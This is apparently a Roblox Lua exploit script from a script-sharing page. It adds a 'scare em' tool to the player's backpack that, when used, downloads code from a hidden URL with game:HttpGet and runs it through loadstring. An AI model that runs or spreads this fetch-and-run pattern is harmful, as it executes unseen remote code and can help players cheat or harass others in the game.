mouse = game.Players.LocalPlayer:GetMouse()
tool = Instance.new("Tool")
tool.RequiresHandle = false
tool.Name = "scare em(Equip to scare them)"
tool.Activated:connect(function()
loadstring(game:HttpGet("https://[Log in to view URL]"))()
end)
tool.Parent = game.Players.LocalPlayer.Backpack
To embed this project on your website, copy the following code and paste it into your website's HTML: